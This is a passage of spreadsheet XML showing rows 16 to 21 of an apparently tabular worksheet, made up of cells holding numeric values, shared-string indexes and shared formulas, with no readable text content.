      <c r="DZ16" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA16" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB16" s="74">
        <v>77.0</v>
      </c>
      <c r="EC16" s="74">
        <v>76.0</v>
      </c>
      <c r="ED16" s="95">
        <f t="shared" si="10"/>
        <v>0.5066666667</v>
      </c>
      <c r="EE16" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="17" ht="153.75" customHeight="1">
      <c r="B17" s="71" t="s">
        <v>261</v>
      </c>
      <c r="C17" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D17" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E17" s="72" t="s">
        <v>280</v>
      </c>
      <c r="F17" s="72" t="s">
        <v>281</v>
      </c>
      <c r="G17" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H17" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I17" s="73" t="s">
        <v>282</v>
      </c>
      <c r="J17" s="73" t="s">
        <v>305</v>
      </c>
      <c r="K17" s="73" t="s">
        <v>306</v>
      </c>
      <c r="L17" s="74">
        <v>50.0</v>
      </c>
      <c r="M17" s="74">
        <v>35.0</v>
      </c>
      <c r="N17" s="74">
        <v>38.0</v>
      </c>
      <c r="O17" s="74">
        <f t="shared" si="1"/>
        <v>38</v>
      </c>
      <c r="P17" s="74">
        <v>38.0</v>
      </c>
      <c r="Q17" s="74">
        <v>0.0</v>
      </c>
      <c r="R17" s="75" t="s">
        <v>307</v>
      </c>
      <c r="S17" s="76" t="s">
        <v>308</v>
      </c>
      <c r="T17" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U17" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V17" s="76" t="s">
        <v>309</v>
      </c>
      <c r="W17" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X17" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y17" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z17" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA17" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB17" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC17" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD17" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE17" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF17" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG17" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH17" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI17" s="78"/>
      <c r="AJ17" s="78"/>
      <c r="AK17" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL17" s="78"/>
      <c r="AM17" s="78"/>
      <c r="AN17" s="78"/>
      <c r="AO17" s="78"/>
      <c r="AP17" s="80"/>
      <c r="AQ17" s="80"/>
      <c r="AR17" s="80"/>
      <c r="AS17" s="80">
        <v>0.0</v>
      </c>
      <c r="AT17" s="80"/>
      <c r="AU17" s="80"/>
      <c r="AV17" s="80"/>
      <c r="AW17" s="80"/>
      <c r="AX17" s="80"/>
      <c r="AY17" s="80"/>
      <c r="AZ17" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA17" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB17" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC17" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD17" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE17" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF17" s="82"/>
      <c r="BG17" s="82"/>
      <c r="BH17" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI17" s="82"/>
      <c r="BJ17" s="82"/>
      <c r="BK17" s="82"/>
      <c r="BL17" s="82"/>
      <c r="BM17" s="83"/>
      <c r="BN17" s="83"/>
      <c r="BO17" s="83"/>
      <c r="BP17" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ17" s="83"/>
      <c r="BR17" s="83"/>
      <c r="BS17" s="83"/>
      <c r="BT17" s="83"/>
      <c r="BU17" s="83"/>
      <c r="BV17" s="83"/>
      <c r="BW17" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX17" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY17" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ17" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA17" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB17" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC17" s="85"/>
      <c r="CD17" s="85"/>
      <c r="CE17" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF17" s="85"/>
      <c r="CG17" s="85"/>
      <c r="CH17" s="85"/>
      <c r="CI17" s="85"/>
      <c r="CJ17" s="86"/>
      <c r="CK17" s="86"/>
      <c r="CL17" s="86"/>
      <c r="CM17" s="86">
        <v>0.0</v>
      </c>
      <c r="CN17" s="86"/>
      <c r="CO17" s="86"/>
      <c r="CP17" s="86"/>
      <c r="CQ17" s="86"/>
      <c r="CR17" s="86"/>
      <c r="CS17" s="86"/>
      <c r="CT17" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU17" s="88">
        <v>2002749.0</v>
      </c>
      <c r="CV17" s="88">
        <v>1.0</v>
      </c>
      <c r="CW17" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX17" s="79">
        <v>2002749.0</v>
      </c>
      <c r="CY17" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ17" s="88"/>
      <c r="DA17" s="88"/>
      <c r="DB17" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC17" s="88"/>
      <c r="DD17" s="88"/>
      <c r="DE17" s="88"/>
      <c r="DF17" s="88"/>
      <c r="DG17" s="89"/>
      <c r="DH17" s="89"/>
      <c r="DI17" s="89"/>
      <c r="DJ17" s="89">
        <v>0.0</v>
      </c>
      <c r="DK17" s="89"/>
      <c r="DL17" s="89"/>
      <c r="DM17" s="89"/>
      <c r="DN17" s="89"/>
      <c r="DO17" s="89"/>
      <c r="DP17" s="89"/>
      <c r="DQ17" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR17" s="91"/>
      <c r="DS17" s="92">
        <v>15621.0</v>
      </c>
      <c r="DT17" s="93">
        <v>1.0</v>
      </c>
      <c r="DU17" s="93">
        <v>37.0</v>
      </c>
      <c r="DV17" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW17" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX17" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY17" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ17" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA17" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB17" s="74">
        <v>50.0</v>
      </c>
      <c r="EC17" s="74">
        <v>35.0</v>
      </c>
      <c r="ED17" s="95">
        <f t="shared" si="10"/>
        <v>0.9210526316</v>
      </c>
      <c r="EE17" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="18" ht="196.5" customHeight="1">
      <c r="B18" s="71" t="s">
        <v>261</v>
      </c>
      <c r="C18" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D18" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E18" s="72" t="s">
        <v>310</v>
      </c>
      <c r="F18" s="72" t="s">
        <v>311</v>
      </c>
      <c r="G18" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H18" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I18" s="73" t="s">
        <v>312</v>
      </c>
      <c r="J18" s="73" t="s">
        <v>313</v>
      </c>
      <c r="K18" s="73" t="s">
        <v>314</v>
      </c>
      <c r="L18" s="74">
        <v>4.0</v>
      </c>
      <c r="M18" s="74">
        <v>1.0</v>
      </c>
      <c r="N18" s="74">
        <v>1.0</v>
      </c>
      <c r="O18" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P18" s="74">
        <v>1.0</v>
      </c>
      <c r="Q18" s="74">
        <v>0.0</v>
      </c>
      <c r="R18" s="75" t="s">
        <v>315</v>
      </c>
      <c r="S18" s="76" t="s">
        <v>316</v>
      </c>
      <c r="T18" s="76" t="s">
        <v>317</v>
      </c>
      <c r="U18" s="77" t="s">
        <v>318</v>
      </c>
      <c r="V18" s="76" t="s">
        <v>319</v>
      </c>
      <c r="W18" s="76" t="s">
        <v>320</v>
      </c>
      <c r="X18" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y18" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z18" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA18" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB18" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC18" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD18" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE18" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF18" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG18" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH18" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI18" s="78"/>
      <c r="AJ18" s="78"/>
      <c r="AK18" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL18" s="78"/>
      <c r="AM18" s="78"/>
      <c r="AN18" s="78"/>
      <c r="AO18" s="78"/>
      <c r="AP18" s="80"/>
      <c r="AQ18" s="80"/>
      <c r="AR18" s="80"/>
      <c r="AS18" s="80">
        <v>0.0</v>
      </c>
      <c r="AT18" s="80"/>
      <c r="AU18" s="80"/>
      <c r="AV18" s="80"/>
      <c r="AW18" s="80"/>
      <c r="AX18" s="80"/>
      <c r="AY18" s="80"/>
      <c r="AZ18" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA18" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB18" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC18" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD18" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE18" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF18" s="82"/>
      <c r="BG18" s="82"/>
      <c r="BH18" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI18" s="82"/>
      <c r="BJ18" s="82"/>
      <c r="BK18" s="82"/>
      <c r="BL18" s="82"/>
      <c r="BM18" s="83"/>
      <c r="BN18" s="83"/>
      <c r="BO18" s="83"/>
      <c r="BP18" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ18" s="83"/>
      <c r="BR18" s="83"/>
      <c r="BS18" s="83"/>
      <c r="BT18" s="83"/>
      <c r="BU18" s="83"/>
      <c r="BV18" s="83"/>
      <c r="BW18" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX18" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY18" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ18" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA18" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB18" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC18" s="85"/>
      <c r="CD18" s="85"/>
      <c r="CE18" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF18" s="85"/>
      <c r="CG18" s="85"/>
      <c r="CH18" s="85"/>
      <c r="CI18" s="85"/>
      <c r="CJ18" s="86"/>
      <c r="CK18" s="86"/>
      <c r="CL18" s="86"/>
      <c r="CM18" s="86">
        <v>0.0</v>
      </c>
      <c r="CN18" s="86"/>
      <c r="CO18" s="86"/>
      <c r="CP18" s="86"/>
      <c r="CQ18" s="86"/>
      <c r="CR18" s="86"/>
      <c r="CS18" s="86"/>
      <c r="CT18" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU18" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV18" s="88">
        <v>2.0</v>
      </c>
      <c r="CW18" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX18" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY18" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ18" s="88"/>
      <c r="DA18" s="88"/>
      <c r="DB18" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC18" s="88"/>
      <c r="DD18" s="88"/>
      <c r="DE18" s="88"/>
      <c r="DF18" s="88"/>
      <c r="DG18" s="89"/>
      <c r="DH18" s="89"/>
      <c r="DI18" s="89"/>
      <c r="DJ18" s="89">
        <v>0.0</v>
      </c>
      <c r="DK18" s="89"/>
      <c r="DL18" s="89"/>
      <c r="DM18" s="89"/>
      <c r="DN18" s="89"/>
      <c r="DO18" s="89"/>
      <c r="DP18" s="89"/>
      <c r="DQ18" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR18" s="91"/>
      <c r="DS18" s="92">
        <v>49480.0</v>
      </c>
      <c r="DT18" s="93">
        <v>1.0</v>
      </c>
      <c r="DU18" s="93">
        <v>3.0</v>
      </c>
      <c r="DV18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA18" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB18" s="74">
        <v>3.0</v>
      </c>
      <c r="EC18" s="74">
        <v>3.0</v>
      </c>
      <c r="ED18" s="95">
        <f t="shared" si="10"/>
        <v>3</v>
      </c>
      <c r="EE18" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="19" ht="177.0" customHeight="1">
      <c r="B19" s="71" t="s">
        <v>261</v>
      </c>
      <c r="C19" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D19" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E19" s="72" t="s">
        <v>310</v>
      </c>
      <c r="F19" s="72" t="s">
        <v>311</v>
      </c>
      <c r="G19" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H19" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I19" s="73" t="s">
        <v>321</v>
      </c>
      <c r="J19" s="73" t="s">
        <v>313</v>
      </c>
      <c r="K19" s="73" t="s">
        <v>322</v>
      </c>
      <c r="L19" s="74">
        <v>1.0</v>
      </c>
      <c r="M19" s="74">
        <v>1.0</v>
      </c>
      <c r="N19" s="74">
        <v>1.0</v>
      </c>
      <c r="O19" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P19" s="74">
        <v>1.0</v>
      </c>
      <c r="Q19" s="74">
        <v>0.0</v>
      </c>
      <c r="R19" s="75" t="s">
        <v>315</v>
      </c>
      <c r="S19" s="76" t="s">
        <v>316</v>
      </c>
      <c r="T19" s="76" t="s">
        <v>323</v>
      </c>
      <c r="U19" s="77" t="s">
        <v>318</v>
      </c>
      <c r="V19" s="76" t="s">
        <v>319</v>
      </c>
      <c r="W19" s="76" t="s">
        <v>320</v>
      </c>
      <c r="X19" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y19" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z19" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA19" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB19" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC19" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD19" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE19" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF19" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG19" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH19" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI19" s="78"/>
      <c r="AJ19" s="78"/>
      <c r="AK19" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL19" s="78"/>
      <c r="AM19" s="78"/>
      <c r="AN19" s="78"/>
      <c r="AO19" s="78"/>
      <c r="AP19" s="80"/>
      <c r="AQ19" s="80"/>
      <c r="AR19" s="80"/>
      <c r="AS19" s="80">
        <v>0.0</v>
      </c>
      <c r="AT19" s="80"/>
      <c r="AU19" s="80"/>
      <c r="AV19" s="80"/>
      <c r="AW19" s="80"/>
      <c r="AX19" s="80"/>
      <c r="AY19" s="80"/>
      <c r="AZ19" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA19" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB19" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC19" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD19" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE19" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF19" s="82"/>
      <c r="BG19" s="82"/>
      <c r="BH19" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI19" s="82"/>
      <c r="BJ19" s="82"/>
      <c r="BK19" s="82"/>
      <c r="BL19" s="82"/>
      <c r="BM19" s="83"/>
      <c r="BN19" s="83"/>
      <c r="BO19" s="83"/>
      <c r="BP19" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ19" s="83"/>
      <c r="BR19" s="83"/>
      <c r="BS19" s="83"/>
      <c r="BT19" s="83"/>
      <c r="BU19" s="83"/>
      <c r="BV19" s="83"/>
      <c r="BW19" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX19" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY19" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ19" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA19" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB19" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC19" s="85"/>
      <c r="CD19" s="85"/>
      <c r="CE19" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF19" s="85"/>
      <c r="CG19" s="85"/>
      <c r="CH19" s="85"/>
      <c r="CI19" s="85"/>
      <c r="CJ19" s="86"/>
      <c r="CK19" s="86"/>
      <c r="CL19" s="86"/>
      <c r="CM19" s="86">
        <v>0.0</v>
      </c>
      <c r="CN19" s="86"/>
      <c r="CO19" s="86"/>
      <c r="CP19" s="86"/>
      <c r="CQ19" s="86"/>
      <c r="CR19" s="86"/>
      <c r="CS19" s="86"/>
      <c r="CT19" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU19" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV19" s="88">
        <v>2.0</v>
      </c>
      <c r="CW19" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX19" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY19" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ19" s="88"/>
      <c r="DA19" s="88"/>
      <c r="DB19" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC19" s="88"/>
      <c r="DD19" s="88"/>
      <c r="DE19" s="88"/>
      <c r="DF19" s="88"/>
      <c r="DG19" s="89"/>
      <c r="DH19" s="89"/>
      <c r="DI19" s="89"/>
      <c r="DJ19" s="89">
        <v>0.0</v>
      </c>
      <c r="DK19" s="89"/>
      <c r="DL19" s="89"/>
      <c r="DM19" s="89"/>
      <c r="DN19" s="89"/>
      <c r="DO19" s="89"/>
      <c r="DP19" s="89"/>
      <c r="DQ19" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR19" s="91"/>
      <c r="DS19" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT19" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU19" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB19" s="74">
        <v>1.0</v>
      </c>
      <c r="EC19" s="74">
        <v>0.0</v>
      </c>
      <c r="ED19" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE19" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="20" ht="153.75" customHeight="1">
      <c r="B20" s="111" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D20" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E20" s="72" t="s">
        <v>324</v>
      </c>
      <c r="F20" s="72" t="s">
        <v>325</v>
      </c>
      <c r="G20" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H20" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I20" s="73" t="s">
        <v>326</v>
      </c>
      <c r="J20" s="73" t="s">
        <v>327</v>
      </c>
      <c r="K20" s="73" t="s">
        <v>328</v>
      </c>
      <c r="L20" s="74">
        <v>15.0</v>
      </c>
      <c r="M20" s="74">
        <v>1.0</v>
      </c>
      <c r="N20" s="74">
        <v>1.0</v>
      </c>
      <c r="O20" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P20" s="74">
        <v>1.0</v>
      </c>
      <c r="Q20" s="74">
        <v>0.0</v>
      </c>
      <c r="R20" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S20" s="76" t="s">
        <v>329</v>
      </c>
      <c r="T20" s="76" t="s">
        <v>330</v>
      </c>
      <c r="U20" s="77" t="s">
        <v>331</v>
      </c>
      <c r="V20" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W20" s="109"/>
      <c r="X20" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y20" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z20" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA20" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB20" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC20" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD20" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE20" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF20" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG20" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH20" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI20" s="78"/>
      <c r="AJ20" s="78"/>
      <c r="AK20" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL20" s="78"/>
      <c r="AM20" s="78"/>
      <c r="AN20" s="78"/>
      <c r="AO20" s="78"/>
      <c r="AP20" s="80"/>
      <c r="AQ20" s="80"/>
      <c r="AR20" s="80"/>
      <c r="AS20" s="80">
        <v>0.0</v>
      </c>
      <c r="AT20" s="80"/>
      <c r="AU20" s="80"/>
      <c r="AV20" s="80"/>
      <c r="AW20" s="80"/>
      <c r="AX20" s="80"/>
      <c r="AY20" s="80"/>
      <c r="AZ20" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA20" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB20" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC20" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD20" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE20" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF20" s="82"/>
      <c r="BG20" s="82"/>
      <c r="BH20" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI20" s="82"/>
      <c r="BJ20" s="82"/>
      <c r="BK20" s="82"/>
      <c r="BL20" s="82"/>
      <c r="BM20" s="83"/>
      <c r="BN20" s="83"/>
      <c r="BO20" s="83"/>
      <c r="BP20" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ20" s="83"/>
      <c r="BR20" s="83"/>
      <c r="BS20" s="83"/>
      <c r="BT20" s="83"/>
      <c r="BU20" s="83"/>
      <c r="BV20" s="83"/>
      <c r="BW20" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX20" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY20" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ20" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA20" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB20" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC20" s="85"/>
      <c r="CD20" s="85"/>
      <c r="CE20" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF20" s="85"/>
      <c r="CG20" s="85"/>
      <c r="CH20" s="85"/>
      <c r="CI20" s="85"/>
      <c r="CJ20" s="86"/>
      <c r="CK20" s="86"/>
      <c r="CL20" s="86"/>
      <c r="CM20" s="86">
        <v>0.0</v>
      </c>
      <c r="CN20" s="86"/>
      <c r="CO20" s="86"/>
      <c r="CP20" s="86"/>
      <c r="CQ20" s="86"/>
      <c r="CR20" s="86"/>
      <c r="CS20" s="86"/>
      <c r="CT20" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU20" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV20" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW20" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX20" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY20" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ20" s="88"/>
      <c r="DA20" s="88"/>
      <c r="DB20" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC20" s="88"/>
      <c r="DD20" s="88"/>
      <c r="DE20" s="88"/>
      <c r="DF20" s="88"/>
      <c r="DG20" s="89"/>
      <c r="DH20" s="89"/>
      <c r="DI20" s="89"/>
      <c r="DJ20" s="89">
        <v>0.0</v>
      </c>
      <c r="DK20" s="89"/>
      <c r="DL20" s="89"/>
      <c r="DM20" s="89"/>
      <c r="DN20" s="89"/>
      <c r="DO20" s="89"/>
      <c r="DP20" s="89"/>
      <c r="DQ20" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR20" s="91"/>
      <c r="DS20" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT20" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU20" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV20" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW20" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX20" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY20" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ20" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA20" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB20" s="74">
        <v>0.0</v>
      </c>
      <c r="EC20" s="74">
        <v>0.0</v>
      </c>
      <c r="ED20" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE20" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="21" ht="153.75" customHeight="1">
      <c r="B21" s="111" t="s">
        <v>261</v>
      </c>
      <c r="C21" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D21" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E21" s="72" t="s">
        <v>332</v>
      </c>
      <c r="F21" s="72" t="s">
        <v>333</v>
      </c>
      <c r="G21" s="72" t="s">
        <v>334</v>
      </c>
      <c r="H21" s="72" t="s">
        <v>335</v>
      </c>
      <c r="I21" s="73" t="s">
        <v>336</v>
      </c>
      <c r="J21" s="73" t="s">
        <v>12</v>
      </c>
      <c r="K21" s="73" t="s">
        <v>337</v>
      </c>
      <c r="L21" s="74">
        <v>2.0</v>
      </c>
      <c r="M21" s="74">
        <v>1.0</v>
      </c>
      <c r="N21" s="74">
        <v>1.0</v>
      </c>
      <c r="O21" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P21" s="74">
        <v>1.0</v>
      </c>
      <c r="Q21" s="74">
        <v>0.0</v>
      </c>
      <c r="R21" s="75" t="s">
        <v>307</v>
      </c>
      <c r="S21" s="112" t="s">
        <v>338</v>
      </c>
      <c r="T21" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U21" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V21" s="76" t="s">
        <v>256</v>
      </c>
      <c r="W21" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X21" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y21" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z21" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA21" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB21" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC21" s="113" t="s">
        <v>112</v>
      </c>
      <c r="AD21" s="101" t="s">
        <v>339</v>
      </c>
      <c r="AE21" s="78">
        <v>2.0</v>
      </c>
      <c r="AF21" s="78">
        <v>3.0</v>
      </c>
      <c r="AG21" s="79"/>
      <c r="AH21" s="101" t="s">
        <v>339</v>
      </c>
      <c r="AI21" s="101"/>
      <c r="AJ21" s="101"/>
      <c r="AK21" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL21" s="101"/>
